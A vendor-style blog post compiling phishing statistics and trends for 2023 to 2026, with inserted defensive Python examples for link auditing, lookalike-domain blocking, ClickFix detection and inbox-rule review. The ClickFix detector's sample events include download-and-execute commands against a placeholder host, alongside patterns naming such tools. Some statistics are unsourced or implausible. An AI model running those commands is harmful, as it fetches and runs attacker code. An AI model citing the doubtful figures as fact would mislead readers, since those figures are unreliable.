99 Global Phishing Statistics & Industry Trends (2023–2026)
More than 3.4 billion phishing emails are sent daily. Learn more eye-opening phishing stats and trends, and understand what the future holds.
Phishing exploits routine business operations to steal credentials or commit payment fraud. Every day, attackers distribute 3.4 billion malicious emails. It’s a volume that represents 1.2% of all global email traffic.
Records from 2023 through late 2025 show a high and steady threat level. By late 2024, spam made up 13% of total email traffic. Nearly 20% of those messages contained phishing lures. While targets like SaaS and webmail logins remain popular, attackers increasingly use QR codes and SMS to bypass standard email security.
AI technology accelerates these risks. Large language models reduced the time needed to create a convincing campaign from 16 hours to five minutes. These tools generate messages that closely resemble standard business correspondence, making lures harder to detect.
Below, you’ll find 99 current statistics grouped by volume, growth, targets, tactics, business impact, off-inbox channels, and incident response patterns.
Key Takeaways For 2026
- Email still drives many phishing campaigns, but SMS and phone-based scams keep growing as follow-on steps.
- Credential theft stays the main objective, with the highest-value targets clustered around SaaS, webmail, and major login ecosystems.
- QR codes moved into the mainstream as a link-delivery method, often tucked into attachments and “business-looking” files.
- BEC and payment diversion remain high-impact outcomes, even when the initial message looks ordinary.
- Teams that make reporting simple and contain incidents quickly limit damage more than teams that rely on inbox filtering alone.
Phishing Volume and Reporting: A High Baseline With Sharp Swings
2023 set a brutal pace; 2024 and 2025 kept quarterly totals in the same range, with jumps that track campaign cycles, platform shifts, and new delivery methods rather than a steady climb. Security researchers detected over 80,000 new phishing websites in a single year, a 22% increase in hosting infrastructure. APWG’s quarterly reporting shows the floor stays high even when one quarter dips. For example:
- APWG logged 877,536 phishing attacks in Q2 2024.
- APWG logged 932,923 phishing attacks in Q3 2024.
Quarterly Totals Still Sit Near a Million
- APWG recorded 1,077,501 phishing attacks in Q4 2023.
- In Q4 2024, APWG recorded 989,123 attacks, continuing the late-year rise that followed a softer first half. Q4 2024 recorded 345,881 attacks in October, 313,288 in November, and 329,954 in December.
- In 2025, APWG logged 1,003,924 attacks in Q1, then 1,130,393 in Q2, then 892,494 in Q3. That Q3 dip still lands near nine hundred thousand attacks for a single quarter.
Reporting Data Keeps Pointing to the Same Core Problem
Victim-complaint data puts phishing and spoofing at or near the top by count. For example, in the FBI’s 2024 IC3 report, phishing and spoofing appear as the top complaint category, with 193,407 complaints listed for 2024.
What this Means for Businesses
Plan for “always on” volume. If you treat phishing as an occasional spike, you’ll tune your controls for the wrong world. You have to build for steady pressure, then add burst capacity for campaign surges: fast takedown paths, quick user reporting, and blocking at layers that do not depend on email gateways alone.
Phishing Year-Over-Year Growth Rates
Phishing volumes haven’t settled back down since 2023. APWG tracked 1,077,501 phishing attacks in Q4 2023, then 989,123 in Q4 2024. That’s not a straight line up; it’s a high plateau. During the first five weeks of 2025, phishing incidents in the US increased by 149% compared to the same period in 2024.
In 2025, APWG recorded a noticeable swing: 1,003,924 attacks in Q1 2025, 1,130,393 in Q2 2025, then 892,494 in Q3 2025. The point isn’t “Q3 dropped, we’re fine.” The point is that quarterly totals can move fast and still stay historically high. The financial pressure is growing too: the average cost of a phishing-related data breach has climbed to $4.88 million.
Impact On Businesses
Victim reporting gives a different angle on the same story. The FBI’s IC3 logged 859,532 complaints in 2024, with reported losses of $16.6 billion across categories. Phishing and spoofing sat at the top by complaint count. The total annual cost of cybercrime is projected to hit $10.5 trillion by the end of 2025.
Two business-facing buckets inside IC3 stay stubbornly expensive:
- Business Email Compromise (BEC): 21,442 complaints and $2.77 billion in reported losses during 2024.
- Phishing/smishing/vishing/pharming: 193,407 complaints in 2024.
Small firms are not exempt from this trend; 35% of micro-businesses reported experiencing phishing in the past year. Furthermore, it takes an average of 254 days to identify and contain a breach that starts with a phish, and breaches identified after the 200-day mark cost an average of $1.2 million more than those caught earlier.
Where Phishers Aim: SaaS Logins, Social Accounts, And Payment Flows
Targeting keeps drifting toward identity choke points. In practice, that means software-as-a-service (SaaS) and webmail sign-ins, social platforms, and payment brands. Attackers go where one set of credentials unlocks many downstream systems. Within web application attacks, 80% of incidents involve compromised or misused credentials.
Sector Targeting Shows Identity First
In APWG’s Q3 2025 report, the most-targeted sector was SaaS and webmail at 21.2% of attacks, followed by social media at 14.6%. Financial institutions came next at 13.2%, with e-commerce and retail close behind at 13.1%, then payment at 12.4%.
Other sectors are seeing sharp rises in interest from attackers:
- Financial services and insurance firms now face 27.7% of all phishing attacks globally.
- In the EU, public administration leads as the most targeted sector at 38%.
- Managed Service Providers (MSPs) have seen 52% of attacks on their firms begin with a phish.
- Engineering roles now account for 64% of hiring-related phishing attempts.
Brand Impersonation Keeps Tilting Toward Big Tech
Check Point Research’s brand phishing reporting shows sustained focus on major tech brands. In Q4 2025, Microsoft appeared in 22% of brand phishing attempts, with other large consumer and platform brands close behind in the top list. The share varies by vendor and sample: another dataset puts Microsoft in 51.7% of brand-impersonation phishing. Either way, Microsoft remains the most impersonated brand worldwide.
APWG’s Q3 2025 report also notes brand churn inside common themes, with Walmart listed as the most impersonated brand in that quarter, replacing DHL. While tech stays top of the list, brands like Telegram, Amazon, and Netflix have recently entered the top five impersonated entities.
What this Means for Businesses
Your riskiest brand phish might not target your brand at all. It might target Microsoft 365, Google Workspace, payroll portals, shipping notices, or a payment processor your team uses. The solution here is to treat identity as infrastructure. Push toward phishing-resistant sign-in where you can, tighten session controls, and block known bad destinations at the DNS layer so a click in chat or a QR scan does not become a login event.
Email Threat Mechanics: Links, Attachments, And Better Disguises
Attackers did not stop using links. But they did get smarter about where links live and how scanners see them. One rising trick is the empty HTML tag: an anchor with no visible text that looks blank to a scanner but is still clickable for a user. Another is the abuse of “part-misplaced” MIME boundaries, which lets a malicious payload slip past security engines when the scanner and the mail client disagree about where one part ends and the next begins.
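To make the empty-tag and misplaced-part problem concrete, here is an added example (not code from the article or from any vendor it cites) that walks every MIME part of a message and reports anchors a user can click but a body-text scanner would miss: empty anchors, anchors hidden by inline style, and links whose visible text names a different domain than the real href. The message, the `.example` domains, and the “last two labels” rule used to compare domains are all constructed assumptions.

```python
"""Audit every text/html part of an email for links that users can click but scanners overlook.

Added example, not the article's code. RAW_EMAIL is a constructed message;
the hostile domains use the reserved .example TLD.
"""
import email
import re
from email import policy
from html.parser import HTMLParser
from urllib.parse import urlparse

RAW_EMAIL = b"""From: "IT Helpdesk" <helpdesk@example.com>
To: user@example.com
Subject: Action required: password expires today
MIME-Version: 1.0
Content-Type: multipart/alternative; boundary="b1"

--b1
Content-Type: text/plain; charset="utf-8"

Your password expires today. Sign in at https://login.example.com to keep access.
--b1
Content-Type: text/html; charset="utf-8"

<html><body>
<p>Your password expires today.</p>
<p><a href="https://login.example.com/reset">Reset your password</a></p>
<p>Or open <a href="https://micros0ft-login.example/verify">https://login.microsoftonline.com</a></p>
<a href="https://phish-kit.example/track"></a>
<a href="https://phish-kit.example/hidden" style="display:none">click</a>
</body></html>
--b1--
"""

# Inline styles that make an anchor invisible while keeping it in the DOM.
HIDDEN_STYLE = re.compile(
    r"display\s*:\s*none|visibility\s*:\s*hidden|font-size\s*:\s*0(?:px|pt)?\s*(?:;|$)", re.I)
# Visible link text that itself looks like a URL or bare domain.
LOOKS_LIKE_URL = re.compile(r"^(?:https?://)?[\w.-]+\.[a-z]{2,}(?:[/?#]\S*)?$", re.I)


class LinkCollector(HTMLParser):
    """Collect each <a> with its href, inline style and the text a user would actually see."""

    def __init__(self):
        super().__init__()
        self.links = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "a" and a.get("href"):
            self._current = {"href": a["href"], "style": a.get("style") or "", "text": ""}

    def handle_data(self, data):
        if self._current is not None:
            self._current["text"] += data

    def handle_endtag(self, tag):
        if tag == "a" and self._current is not None:
            self._current["text"] = " ".join(self._current["text"].split())
            self.links.append(self._current)
            self._current = None


def registrable(host):
    # Assumption: last two labels. Production code should use the Public Suffix List.
    return ".".join(host.lower().rstrip(".").split(".")[-2:])


def flags_for(link):
    """Return the reasons one anchor deserves a second look (empty list if none)."""
    flags = []
    text = link["text"]
    href_host = urlparse(link["href"]).hostname or ""
    if not text:
        flags.append("empty-anchor")            # blank to a scanner, clickable to a user
    if HIDDEN_STYLE.search(link["style"]):
        flags.append("hidden-by-style")
    if text and LOOKS_LIKE_URL.match(text):
        shown = text if "://" in text else "http://" + text
        text_host = urlparse(shown).hostname or ""
        if registrable(text_host) != registrable(href_host):
            flags.append("text-href-mismatch")  # displayed URL and real destination differ
    return flags


def suspicious_links(raw: bytes):
    """Walk every MIME part, so a link in a nested or oddly placed part is still inspected."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    findings = []
    for idx, part in enumerate(msg.walk()):
        if part.get_content_type() != "text/html":
            continue
        collector = LinkCollector()
        collector.feed(part.get_content())
        for link in collector.links:
            flags = flags_for(link)
            if flags:
                findings.append({"part": idx, "href": link["href"], "text": link["text"], "flags": flags})
    return findings


if __name__ == "__main__":
    for finding in suspicious_links(RAW_EMAIL):
        print(finding["flags"], finding["href"], repr(finding["text"]))
```

Note that the text/plain part of the sample is clean: a gateway that scans only the first or the plain-text part would pass this message, which is exactly the gap the empty-anchor and mismatched-text tricks exploit.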
Links Still Drive Most User Actions
In many phishing chains, the key moment stays the same: someone gets redirected to a convincing sign-in page, then hands over credentials. Attackers keep refining page look, domain tricks, and multi-step flows that mirror real login experiences. Roughly 80% of phishing websites now use HTTPS, so the padlock creates a false sense of security; it proves only that the connection is encrypted, not that the site is legitimate.
Check Point’s Q4 2025 examples highlight lookalike domains and polished flows that blend in with normal browsing. Attackers are registering these lookalike domains in bursts, often using them for only a few hours to stay ahead of blocklists.
QR Codes in Attachments Became a Reliable Bypass
APWG’s Q3 2025 report includes data from Mimecast on malicious QR codes found in email attachments. Mimecast detected 716,306 unique malicious QR codes in Q3 2025, up 13% from Q2 2025. From Q2 2024 through Q3 2025, Mimecast detected more than 3 million unique malicious QR codes.
Links hidden inside PDF or HTML attachments have also risen 8% year-over-year, showing a move away from malicious files toward "structural deception" that tricks a user into a legitimate-looking workflow.
That pattern explains why “no URL in the email body” does not mean “no phishing risk.” The destination still exists. The user just reaches it through a camera scan instead of a click.
What this Means for Businesses
If your controls stop at the inbox, QR phishing and chat-delivered links will keep slipping past. Add scanning and blocking that covers destinations, not only messages. DNS-layer filtering helps here: the user’s device still has to resolve the domain after a click or scan.
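The lookalike domains mentioned in the Check Point examples above and the DNS-layer blocking recommended here come together in a single decision: when a device resolves a name, is it a known-bad or lookalike destination? Below is an added example (not Control D’s resolver logic or any vendor’s code) of that decision for a small set of protected brands. The brand list, the blocklist, and the rule that the registrable domain is the last two labels are constructed assumptions; a real deployment would use a threat-intelligence feed and the Public Suffix List.

```python
"""Classify a hostname as BLOCK/ALLOW for a DNS-layer phishing filter.

Added example, not Control D's code. PROTECTED_BRANDS, KNOWN_BAD and the
"last two labels = registrable domain" rule are constructed assumptions.
"""
import unicodedata
from dataclasses import dataclass

# Constructed: brands whose logins are commonly targeted, mapped to their real domain.
PROTECTED_BRANDS = {
    "microsoft": "microsoft.com",
    "google": "google.com",
    "paypal": "paypal.com",
    "usps": "usps.com",
}
LEGIT_DOMAINS = set(PROTECTED_BRANDS.values())

# Constructed blocklist standing in for a threat-intelligence feed.
KNOWN_BAD = {"secure-login-update.example", "phish-kit.example"}

# Single characters that pass for letters in lookalike registrations.
HOMOGLYPHS = str.maketrans({"0": "o", "1": "l", "3": "e", "5": "s", "7": "t", "$": "s"})
# Character pairs that render like one letter in many fonts.
MULTIGLYPHS = [("rn", "m"), ("vv", "w"), ("cl", "d")]


@dataclass
class Verdict:
    action: str   # "BLOCK" or "ALLOW"
    reason: str


def normalize_label(label: str) -> str:
    """Fold one DNS label to a canonical ASCII form for comparison."""
    # NFKD splits 'í' into 'i' plus a combining accent, which is then dropped.
    label = unicodedata.normalize("NFKD", label)
    label = "".join(ch for ch in label if not unicodedata.combining(ch))
    label = label.lower().translate(HOMOGLYPHS)
    for seq, letter in MULTIGLYPHS:
        label = label.replace(seq, letter)
    return label


def edit_distance(a: str, b: str) -> int:
    """Levenshtein distance (insert/delete/substitute) by plain dynamic programming."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def classify(hostname: str) -> Verdict:
    host = hostname.rstrip(".").lower()
    # Decode punycode so homoglyph folding sees the real (Unicode) characters.
    if "xn--" in host:
        host = host.encode("ascii").decode("idna")
    labels = host.split(".")

    # 1. Exact or parent-domain hit on the blocklist.
    for i in range(len(labels)):
        candidate = ".".join(labels[i:])
        if candidate in KNOWN_BAD:
            return Verdict("BLOCK", "on blocklist: " + candidate)

    registrable = ".".join(labels[-2:])
    if registrable in LEGIT_DOMAINS:
        return Verdict("ALLOW", "legitimate brand domain")

    norm = [normalize_label(label) for label in labels]
    norm_registrable = ".".join(norm[-2:])
    sld, subdomains = norm[-2], norm[:-2]

    for brand, legit in PROTECTED_BRANDS.items():
        # 2. Homoglyph or IDN copy of the real registrable domain.
        if norm_registrable == legit:
            return Verdict("BLOCK", f"homoglyph lookalike of {legit}")
        # 3. Typosquat: small edit distance on the second-level label.
        limit = 2 if len(brand) >= 8 else 1
        if sld != brand and edit_distance(sld, brand) <= limit:
            return Verdict("BLOCK", f"typosquat of {brand}")
        # 4. Brand name embedded in the label or pushed into a subdomain of an unrelated domain.
        if brand in sld or brand in subdomains:
            return Verdict("BLOCK", f"{brand} used on unrelated domain {registrable}")
    return Verdict("ALLOW", "no match")


if __name__ == "__main__":
    for name in ["login.microsoft.com", "rnicrosoft.com", "mircosoft.com",
                 "microsoft.com.account-verify.net", "www.phish-kit.example", "example.org"]:
        v = classify(name)
        print(f"{name:40} {v.action:6} {v.reason}")
```

Rules 3 and 4 are signals rather than proof (a legitimate partner site can embed a brand name), so in practice they feed a review queue or a warning page, while rules 1 and 2 are safe to block outright.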
Smishing, Vishing, and Off-Inbox Fraud: Growth Outside Email
Email keeps its role, yet attackers moved more effort into channels where users feel less suspicious and where corporate tooling has thinner coverage. Roughly 70% of all mobile-based phishing attacks now occur through SMS (smishing), and vishing incidents surged 442% in the latter half of 2024.
SMS Fraud Rose Again in 2025
In Q3 2025, APWG reported that SMS-based fraud increased by nearly 35% across the quarter. The use of deepfake voice clones for executive impersonation rose 15% last year, and research shows that 77% of AI voice clone scam victims lost money.
Phone and “Call This Number” Scams Keep Showing Up in Reporting
APWG’s Q4 2023 communications highlighted phone-based cybercrime surges as part of the phishing ecosystem.
A common pattern looks simple: an email or text instructs the victim to call a number, then a fake support workflow takes over. Attackers are increasingly using "hybrid" social engineering, where an email is followed by a text and then a phone call to build legitimacy.
What this Means for Businesses
Treat phones and messaging apps as first-class phishing channels. Write process rules that fit those tools: no password resets or payment changes via SMS, no vendor bank detail changes via chat, no helpdesk resets without a second check. Then back that policy with technical blocks at the destination layer.
Business Email Compromise and Payment Fraud: Fewer Clicks, Bigger Stakes
More phishing campaigns now aim at money movement, not malware delivery. However, phishing is still the primary delivery method for 54% of ransomware infections. Attackers want invoice payments, payroll changes, gift card purchases, and wire transfers.
BEC Losses Stay Huge
The FBI’s 2024 IC3 report lists BEC as a major loss driver, with $2.77 billion in losses reported for 2024. High-value "whaling" attacks targeting executives cost businesses an average of $47 million per incident. Additionally, APWG’s Q3 2025 report states that total wire-transfer BEC attacks increased by 57% compared to Q2 2025, with an average requested amount of $48,115 in Q3 2025.
The financial impact varies by company size:
- The average self-reported cost of a cyber incident for a small business has reached $56,600.
- For large enterprises, the average cost per incident has spiked by 219%, reaching over $200,000 in direct losses.
- The average downtime following a successful phishing-led attack is now 24 days.
What this Means for Businesses
Build payment friction on purpose. Use call-back verification on known numbers, add approval steps for vendor changes, and require out-of-band confirmation for bank detail updates. Do not rely on “we’ll spot the weird email.” BEC emails often look clean.
AI-Assisted Phishing and Click Economics: Higher Conversion, Not Just Higher Volume
Here, the story shifted from “attackers write better emails” to “attackers tune messages like conversion funnels.” There has been a 1,265% surge in phishing attacks linked specifically to the rise of generative AI tools.
Click-Through Rates Can Jump when Messages Look Real
In its 2025 Digital Defense Report, Microsoft reports much higher click-through rates for AI-generated phishing than for human-written phishing in its testing, citing 54% versus 12%. AI-generated phishing emails achieve a 78% open rate, helped by the absence of the telltale spelling and grammar mistakes users were trained to spot, and over 82% of current phishing emails now use some form of AI-generated content.
The efficiency gains for attackers are significant:
- Attackers can now save up to 95% on campaign costs by using LLMs for reconnaissance.
- More than 90% of "polymorphic" attacks now leverage AI.
- Deepfake fraud incidents have seen a 2,137% increase since 2022.
Social Engineering Tactics Keep Evolving Around Human Action
Mimecast’s 2025 Threat Intelligence reporting states that phishing accounted for 77% of attacks, up from 60% in 2024, and it highlights a 500% surge in “ClickFix” attacks, where a user gets tricked into running a command or workflow that hands control to the attacker.
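ClickFix is worth a detection of its own because no attachment or link click ever happens: the user pastes a command into a Run box or terminal. The added example below (not Mimecast’s or the article’s code) scores process-creation events for the combination that characterizes it: an interactive parent such as explorer.exe launching a script host with a remote URL, a hidden-window flag, a download-and-execute verb, or an encoded command. The events, field names, and the two-signal threshold are constructed assumptions; map the fields from Sysmon Event ID 1 or your EDR’s process-start telemetry.

```python
"""Spot ClickFix-style executions in process-creation telemetry.

Added example, not the article's or any vendor's code. EVENTS is constructed
with a minimal field set (parent image, child image, command line).
"""
import re

# Launched by the shell when a user pastes into Win+R, a terminal, or the Explorer address bar.
INTERACTIVE_PARENTS = {"explorer.exe", "windowsterminal.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe", "cscript.exe"}

# Independent signals; two or more in one event is the alert threshold (an assumption to tune).
SIGNALS = {
    "remote-url": re.compile(r"https?://", re.I),
    "hidden-window": re.compile(r"-w(?:indowstyle)?\s+hidden|-nop\b|-noprofile\b", re.I),
    "download-or-eval": re.compile(
        r"\b(?:iwr|iex|invoke-webrequest|invoke-expression|downloadstring|curl|bitsadmin|certutil)\b", re.I),
    "encoded-command": re.compile(r"-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I),
}

# Constructed events: 0, 1 and 4 are ClickFix-style; 2 is a scheduled script; 3 is a user opening a console.
EVENTS = [
    {"parent": r"C:\Windows\explorer.exe", "image": "powershell.exe",
     "cmd": 'powershell.exe -w hidden -c "iwr http://fix-kit.example/v.ps1 | iex"'},
    {"parent": "explorer.exe", "image": r"C:\Windows\System32\mshta.exe",
     "cmd": "mshta https://fix-kit.example/verify.hta"},
    {"parent": "cmd.exe", "image": "powershell.exe",
     "cmd": r"powershell.exe -File C:\scripts\backup.ps1"},
    {"parent": "explorer.exe", "image": "powershell.exe", "cmd": "powershell.exe"},
    {"parent": "explorer.exe", "image": "cmd.exe",
     "cmd": 'cmd /c "curl -s http://fix-kit.example/a.exe -o %TEMP%\\a.exe && %TEMP%\\a.exe"'},
]


def basename(path: str) -> str:
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def score_event(event) -> list:
    """Return the signal names that fire, or [] when the event does not meet the threshold."""
    parent, child, cmd = basename(event["parent"]), basename(event["image"]), event["cmd"]
    if parent not in INTERACTIVE_PARENTS or child not in SCRIPT_HOSTS:
        return []
    hits = [name for name, rx in SIGNALS.items() if rx.search(cmd)]
    # mshta pointed at a URL is enough on its own; everything else needs two signals.
    if child == "mshta.exe" and "remote-url" in hits:
        return hits
    return hits if len(hits) >= 2 else []


def detect_clickfix(events):
    """(index, signals) for every event that looks like a pasted ClickFix command."""
    results = []
    for i, event in enumerate(events):
        hits = score_event(event)
        if hits:
            results.append((i, hits))
    return results


if __name__ == "__main__":
    for index, hits in detect_clickfix(EVENTS):
        print(index, hits, EVENTS[index]["cmd"])
```

The parent-process condition is what keeps this rule quiet: administrators run the same verbs from scheduled tasks and deployment tools all day, but those do not start from explorer.exe.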
What this Means for Businesses
Training still matters, yet training alone won’t keep up with higher-converting lures. Pair training with tighter identity controls and better containment. Focus on reducing the blast radius: short session lifetimes, stronger multi-factor authentication (MFA) choices, device checks, and destination blocking.
What Incident Responders Report: Phishing Still Opens Doors
A lot of teams hoped that better email security and MFA would push phishing down the list of initial access methods. Incident response summaries keep showing phishing and social engineering near the front of the chain. Business Email Compromise now accounts for 27% of all incident response engagements.
Phishing Shows up as an Initial Access Path
In Cisco Talos Incident Response reporting for Q4 2025, Talos notes an increase in phishing as an initial access vector, rising from 23% in the prior quarter to 32%. Despite technical controls, 88% of all data breaches are still attributed to human error, and failure to use MFA on privileged accounts is still responsible for 17% of cloud-based breaches.
Training and Automation Impact
Response times and training remain the best defenses:
- Organizations with active security behavior programs can reduce the number of phishing incidents by 86%.
- Employees who receive regular training report phishing attempts 4x more often.
- The use of security AI and automation for response has been shown to cut the average cost of a breach by $1.9 million.
What this Means for Businesses
Assume one phish will land each quarter, then plan what happens next. Tighten logging, make reporting easy, and build a fast containment playbook that starts with account lock, token revocation, mailbox rules review, and destination blocking.
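The mailbox-rules step in that playbook is the one most often skipped, and it is where BEC actors keep access after a password reset: a rule that forwards invoices outside the tenant, or deletes or buries replies that mention passwords or security alerts, survives the account lock. The added example below (not the article’s code) reviews a set of rules and reports the ones that match those patterns. The rules are constructed, the field names are modeled on Microsoft Graph’s messageRule shape as an assumption, and the keyword and folder lists are starting points to tune.

```python
"""Flag attacker-style inbox rules during phishing containment.

Added example, not the article's code. SAMPLE_RULES is constructed and uses a
simplified shape modeled on Microsoft Graph's messageRule (an assumption);
adapt the field names to whatever your mail platform exports.
"""
INTERNAL_DOMAINS = {"example.com"}  # constructed: the tenant's own domains

# Subjects and phrases attackers hide so the victim never sees the reply or the alert.
SENSITIVE_WORDS = ("password", "invoice", "payment", "wire", "mfa", "security", "suspicious", "hacked")
# Folders nobody reads, used to park mail without deleting it.
PARKING_FOLDERS = {"rss subscriptions", "rss feeds", "archive", "junk email",
                   "conversation history", "deleted items"}

SAMPLE_RULES = [
    {"displayName": "Move newsletters", "isEnabled": True,
     "conditions": {"fromAddresses": ["news@vendor.example"]},
     "actions": {"moveToFolder": "Newsletters"}},
    {"displayName": ".", "isEnabled": True,
     "conditions": {"subjectContains": ["invoice", "payment"]},
     "actions": {"forwardTo": ["collector@free-mail.example"], "delete": True}},
    {"displayName": "Cleanup", "isEnabled": True,
     "conditions": {"bodyContains": ["password", "suspicious sign-in"]},
     "actions": {"moveToFolder": "RSS Subscriptions", "markAsRead": True}},
    {"displayName": "Out of office copy", "isEnabled": True,
     "conditions": {},
     "actions": {"forwardTo": ["me@example.com"]}},
]


def external(addresses):
    """Addresses whose domain is not one of ours."""
    return [a for a in addresses if a.split("@")[-1].lower() not in INTERNAL_DOMAINS]


def rule_findings(rule) -> list:
    """Reasons a single rule looks like BEC persistence (empty list if clean)."""
    reasons = []
    if not rule.get("isEnabled", True):
        return reasons
    acts = rule.get("actions", {})
    conds = rule.get("conditions", {})
    keywords = [k.lower() for key in ("subjectContains", "bodyContains") for k in conds.get(key, [])]

    # 1. Mail leaving the tenant by forward or redirect.
    outbound = external(acts.get("forwardTo", []) + acts.get("redirectTo", [])
                        + acts.get("forwardAsAttachmentTo", []))
    if outbound:
        reasons.append("forwards mail outside the tenant: " + ", ".join(outbound))

    # 2. Sensitive messages deleted or parked where the user will not see them.
    hides = bool(acts.get("delete")) or str(acts.get("moveToFolder", "")).lower() in PARKING_FOLDERS
    hidden_topics = [k for k in keywords if any(w in k for w in SENSITIVE_WORDS)]
    if hides and hidden_topics:
        reasons.append("hides messages about " + ", ".join(hidden_topics))

    # 3. Rules named with a single character or nothing, a common attacker habit.
    name = rule.get("displayName", "").strip()
    if len(name) <= 1:
        reasons.append("near-empty rule name " + repr(name))
    return reasons


def review_mailbox(rules) -> dict:
    """Map rule index -> reasons for every rule that needs an analyst's eyes."""
    report = {}
    for i, rule in enumerate(rules):
        reasons = rule_findings(rule)
        if reasons:
            report[i] = reasons
    return report


if __name__ == "__main__":
    for index, reasons in review_mailbox(SAMPLE_RULES).items():
        print(index, SAMPLE_RULES[index]["displayName"], reasons)
```

Run this against the rules exported from the compromised mailbox before re-enabling the account, and keep a copy of each flagged rule as evidence: the external forwarding address is often the fastest pivot to the rest of the actor’s infrastructure.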
Regional and Sector Notes: A View from North America
North America’s phishing story shifted toward mobile-first starts and identity-led outcomes. More scams now begin on a phone screen, then pull the victim into a web flow that looks like a normal login, delivery update, toll notice, or account warning. That shift matters for businesses since it moves risk outside the corporate inbox and into personal devices, shared SMS threads, and quick taps made between meetings.
Text-First Scams Became a Major On-Ramp
FTC data shows how much money moved through scams that start with a text message. In 2024, consumers reported $470 million in losses to text message scams, and the FTC noted that figure is five times higher than in 2020, even though the number of reports declined. Translation: fewer reports can still hide bigger losses when scammers improve conversion and payout per victim.
Mobile Phishing Kept Climbing
On the enterprise side, mobile channels keep gaining share. Zimperium’s 2025 mobile threat reporting says vishing rose 28% and smishing rose 22% in its measured period.
Breach Patterns Still Reward Credential Theft
Verizon’s 2025 DBIR frames what happens after a successful lure. Within Basic Web Application Attacks, Verizon reports about 88% of breaches in that pattern involved stolen credentials. That’s a useful North America-relevant lens since so many phishing campaigns aim at cloud logins first, then reuse those credentials across email, SaaS, and admin portals.
Smishing Runs on Industrial-Scale Infrastructure
Some of the newest North America-facing signal sits in how fast scam infrastructure can appear. In a November 2025 lawsuit described by Reuters, Google alleged a text phishing scheme that created nearly 200,000 fraudulent websites in 20 days, impersonating brands like Google, USPS, and E-ZPass. Even if you treat that as one operation, it shows the scale at which text-driven phishing can spin up new domains and landing pages.
What this Means for Businesses
North America’s current pattern pushes you to cover three gaps that older “email-only” programs leave behind:
- Cover mobile starts. Write a simple rule that your team can follow on phones: no logins, password resets, or payment changes from links in texts.
- Treat credentials like cash. Prioritize phishing-resistant sign-in for high-risk roles and lock down OAuth app consent, since attackers often aim for access that survives password changes.
- Block destinations, not just messages. Texts, QR scans, and chat links still have to resolve a domain. If you block known bad and lookalike domains at the DNS layer, you can stop many chains after the tap and before the login page loads.
Where Control D Fits in a Phishing Defense Stack
DNS filtering won’t fix every phishing problem. It won’t rewrite a bad payment process, rotate passwords, or stop a user from pasting commands into a terminal. But it absolutely can stop a lot of “click to credential theft” and “click to malware” journeys by blocking the DNS lookup that happens right before a browser loads the phishing page.
Control D’s positioning here is simple:
- Block known phishing domains and lookalike infrastructure at the DNS layer (before the page loads).
- Use category-based web filtering to reduce exposure to high-risk destinations when the business context doesn’t justify access.
- For edge cases where blocklists lag, Control D’s experimental AI Malware Filter classifies suspicious domains without waiting for a blocklist entry (treat it as one more signal, not magic).
One practical mindset helps: treat phishing as “untrusted destination risk,” then combine DNS controls, email security, MFA, and finance-grade approvals so one miss doesn’t become a payout.
Practical Next Steps for Businesses
The most reliable improvements now come from reducing the number of places a phish can succeed, then blocking the destinations that power credential theft and payment fraud. Email security still matters. It just cannot be your only line.
Start with Identity Hardening that Fits Real Work
Move high-risk roles to phishing-resistant MFA where possible, lock down admin accounts, and reduce standing privileges. Treat SaaS logins as production systems, not “just accounts.”
Add Destination Blocking Outside the Inbox
A user can meet a phish through chat, a shared doc, a QR code, or a sponsored ad. DNS-layer filtering helps block access to known malicious domains across those paths, including on roaming devices. That matters when the lure arrives outside email, or when the email contains a QR code instead of a URL.
Make Payment and Vendor Changes Slow on Purpose
Use two-person approval for wire changes, verify bank detail updates using known contact info, and set rules that block “new payee” payments until someone confirms. Most teams lose money during routine workflows, not dramatic hacks.
Tighten Your Response Loop
Make reporting easy and respond fast. Untrained employees have only a 13% reporting rate, which grows to 71% after 24 months of consistent training.
That’s a Wrap
Phishing keeps working since it matches how teams actually operate: logins, invoices, quick approvals, and messages that feel routine. The data from 2023 through late 2025 shows steady volume, more off-inbox delivery, and heavier focus on SaaS and webmail credentials.
For businesses, the best gains come from tightening identity controls, adding friction to payment changes, and blocking risky destinations outside email so a tap or scan does not turn into a sign-in event.
